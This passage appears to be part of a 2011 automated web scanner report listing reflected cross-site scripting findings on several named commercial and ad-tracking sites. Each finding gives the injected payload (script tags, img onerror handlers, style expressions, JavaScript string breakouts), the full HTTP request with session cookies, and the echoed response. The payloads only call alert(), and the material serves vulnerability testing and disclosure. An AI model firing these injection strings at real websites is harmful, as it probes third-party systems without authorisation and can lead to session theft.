Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:37 GMT
Connection: close

Unable to find /pacsun/mainNav2_swim3Offc95c0<img src=a onerror=alert(1)>8c10e31f2ec

5.31. http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/mainNav2_womens3Off

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c was submitted in the REST URL parameter 4. This input was echoed as f9702<img src=a onerror=alert(1)>08c67d0bd9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/mainNav2_womens3Offf9702<img%20src%3da%20onerror%3dalert(1)>08c67d0bd9c?$img_gif$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:34 GMT
Connection: close

Unable to find /pacsun/mainNav2_womens3Offf9702<img src=a onerror=alert(1)>08c67d0bd9c

5.32. http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/newPromo_042811

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0 was submitted in the REST URL parameter 4. This input was echoed as e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/newPromo_042811e5ba6<img%20src%3da%20onerror%3dalert(1)>f5ab3ce03c0?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:59:43 GMT
Connection: close

Unable to find /pacsun/newPromo_042811e5ba6<img src=a onerror=alert(1)>f5ab3ce03c0

5.33. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/pop_email_011011b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8 was submitted in the REST URL parameter 4. This input was echoed as d2c41<img src=a onerror=alert(1)>5c8d452e9c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/pop_email_011011bd2c41<img%20src%3da%20onerror%3dalert(1)>5c8d452e9c8?$img_jpg$&$ext=.jpg HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:46 GMT
Connection: close

Unable to find /pacsun/pop_email_011011bd2c41<img src=a onerror=alert(1)>5c8d452e9c8

5.34. http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/redesign_social

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec was submitted in the REST URL parameter 4. This input was echoed as 25ab1<img src=a onerror=alert(1)>aeaa39cfdec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/redesign_social25ab1<img%20src%3da%20onerror%3dalert(1)>aeaa39cfdec?$img_gif-alpha$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close

Unable to find /pacsun/redesign_social25ab1<img src=a onerror=alert(1)>aeaa39cfdec

5.35. http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://images3.pacsun.com
Path:	/is/image/pacsun/spacer

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480 was submitted in the REST URL parameter 4. This input was echoed as ee327<img src=a onerror=alert(1)>a0cf7621480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/spaceree327<img%20src%3da%20onerror%3dalert(1)>a0cf7621480?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510854236}; mbox=session#1305510221453-787352#1305512723|check#true#1305510918; fsr.a=1305510862438

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 73
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 02:00:12 GMT
Connection: close

Unable to find /pacsun/spaceree327<img src=a onerror=alert(1)>a0cf7621480

5.36. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox12.offermatica.com
Path:	/m2/guitarcenter/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 15167<script>alert(1)</script>f4f6edc5c01 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events15167<script>alert(1)</script>f4f6edc5c01&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 208
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events15167<script>alert(1)</script>f4f6edc5c01',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

5.37. http://pixel.fetchback.com/serve/fb/pdc [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6 was submitted in the name parameter. This input was echoed as 26383<x style=x:expression(alert(1))>17d9ad9eed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing26383<x%20style%3dx%3aexpression(alert(1))>17d9ad9eed6&sid=3167 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1305510200_11939:0_5512:44812; uid=1_1305510200_1305465388147:4406953890584386; kwd=1_1305510200; sit=1_1305510200_3166:0:0_3167:28:28_1888:44812:44812; cre=1_1305510200; bpd=1_1305510200; apd=1_1305510200; scg=1_1305510200; ppd=1_1305510200; afl=1_1305510200

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1305511011_11939:811_5512:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: uid=1_1305511011_1305465388147:4406953890584386; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: kwd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: sit=1_1305511011_3166:811:811_3167:839:839_1888:45623:45623; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: cre=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: bpd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: apd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: scg=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: ppd=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Set-Cookie: afl=1_1305511011; Domain=.fetchback.com; Expires=Sat, 14-May-2016 01:56:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 16 May 2011 01:56:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

5.38. http://px.steelhousemedia.com/pr [get_px parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://px.steelhousemedia.com
Path:	/pr

Issue detail

The value of the get_px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb714'-alert(1)-'9f1b1c0493f was submitted in the get_px parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pr?get_px=1cb714'-alert(1)-'9f1b1c0493f&prov_id=9056 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1cb714'-alert(1)-'9f1b1c0493f&aid=9056&cb=1305542500340658&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('sc
...[SNIP]...

5.39. http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://px.steelhousemedia.com
Path:	/pr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb2d'-alert(1)-'136f0dfcab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pr?get_px=1&prov_id=9056&9eb2d'-alert(1)-'136f0dfcab4=1 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=9056&9eb2d'-alert(1)-'136f0dfcab4=1&cb=1305542505819756&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');
...[SNIP]...

5.40. http://px.steelhousemedia.com/pr [prov_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://px.steelhousemedia.com
Path:	/pr

Issue detail

The value of the prov_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8130e'-alert(1)-'66a20514f58 was submitted in the prov_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pr?get_px=1&prov_id=90568130e'-alert(1)-'66a20514f58 HTTP/1.1
Host: px.steelhousemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: checkCookie=success;Domain=.steelhousemedia.com
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Connection: close

(function() {
steelhouse = {
   cadd: function(obj, etype, fn, cap) {
       cap = cap || false;
       if (obj.addEventListener) obj.addEventListener(etype, fn, cap);
       else if (obj.attachEvent) obj.attachEvent("on" + etype, fn);
   },
   cload: function() {
       var st = document.createElement('script');
       var sturl = 'px.steelhousemedia.com/st?get_px=1&aid=90568130e'-alert(1)-'66a20514f58&cb=1305542503023599&ce=1';
       st.type = 'text/javascript';
       st.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + sturl;
       var list=document.getElementsByTagName('script');

...[SNIP]...

5.41. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload f1893%0aalert(1)//ec5edae4c66 was submitted in the site parameter. This input was echoed as f1893
alert(1)//ec5edae4c66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=1402662f1893%0aalert(1)//ec5edae4c66&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 02:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 458
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSDRRBRB=JICDIKHANBIPGCCIIAEHECCG; path=/
Cache-control: private

//Plugins for site 1402662f1893
alert(1)//ec5edae4c66
<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2
...[SNIP]...

5.42. https://secure.bhphotovideo.com/bnh/controller/home [O parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The value of the O request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49fb3'><script>alert(1)</script>d3fa006fb10 was submitted in the O parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp49fb3'><script>alert(1)</script>d3fa006fb10&A=getpage&Q=Login.jsp HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

5.43. https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The value of the f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd request parameter is copied into the HTML document as plain text between tags. The payload 91394<script>alert(1)</script>a321fbd6cb1 was submitted in the f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=191394<script>alert(1)</script>a321fbd6cb1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

5.44. https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://secure.bhphotovideo.com
Path:	/bnh/controller/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d64"><script>alert(1)</script>bb73022ddbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64"><script>alert(1)</script>bb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

5.45. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sr2.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 97932%0aalert(1)//3be4a2facd2 was submitted in the site parameter. This input was echoed as 97932
alert(1)//3be4a2facd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=5396538397932%0aalert(1)//3be4a2facd2&d_id=toshiba HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 459
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
